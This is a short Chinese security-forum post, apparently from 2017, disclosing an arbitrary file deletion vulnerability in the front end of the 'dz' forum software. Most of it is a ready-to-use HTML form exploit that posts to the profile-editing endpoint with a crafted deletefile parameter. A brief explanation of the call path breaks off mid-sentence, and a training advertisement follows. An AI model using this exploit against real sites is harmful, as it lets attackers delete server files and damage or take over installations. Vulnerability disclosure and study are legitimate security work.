-
-
[原创]dz前台可任意删除文件漏洞
-
发表于:
2017-10-10 20:13
6123
-
前提条件:
在根路径下创建favicon.ico此文件进行测试
post页面内容:
<html>
<form action="https://*/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST"
enctype="multipart/form-data">
<input type="file"
name="birthprovince" id="file" />
<input type="text"
name="profilesubmit"value="1"/></p>
<input type="submit"
value="Submit" />
</form>
</html>
在上传时,调用home_spacecp.php,通过home_spacecp.php调用了
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
